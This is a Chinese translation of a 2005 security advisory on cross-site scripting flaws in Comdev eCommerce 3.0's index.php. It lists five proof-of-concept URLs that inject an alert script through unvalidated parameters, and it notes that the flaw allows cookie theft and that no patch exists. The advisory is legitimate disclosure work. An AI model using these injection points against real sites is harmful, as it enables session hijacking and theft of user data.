本文作者： Z.C.Y[B.C.T]
文章出处： 原创翻译 http://www.bnso.net/
发布日期： 2005-1-27

安全公告ID：1013012
资料来源：http://securitytracker.com/id?1013012
原始资料：http://www.systemsecure.org/wwwboard/messages/222.html
CVE 参考：http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
发布日期：2005-1-26
发布作者：SmOk3 f00bar <smok3f00@gmail.com>
漏洞影响：泄露验证信息，泄露用户信息，执行任意代码，修改用户信息
影响系统：所有Linux , UNIX , Windows
含有漏洞利用程序：是
影响版本：3.0
漏洞起因：输入合法性错误


描述：SmOk3 of SystemSecure.org发现Comdev eCommerce中存在输入合法性漏洞，导致远程用户实现跨站脚本攻击。

&#39;index.php&#39;脚本中的start, category_id, keyword, pageaction 和 product_id 这几个参数对用户提交的数据验证不严。
因此，一个远程用户可以精心构造一个URL，当目标用户登陆到这个URL上时，就会在目标用户的浏览器上执行任意脚本代码。
这个代码来源于运行Comdev eCommerce软件的站点和运行在站点的安全内容上。结果是，目标用户的cookies（包括验证信息），
目标用户提交任何与站点有关的数据或者以目标用户的身份在站点上操作都会被代码获得。

提供如下测试方法：
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=

解决方法：
目前厂商还没有提供补丁或者升级程序
厂商地址:http://www.comdevweb.com/ecommerce.php

唉。。。。。。冰血，最近我们BCT的翻译小组都会乡下和考公务员啊！！所以翻译资料都减少了！见凉啊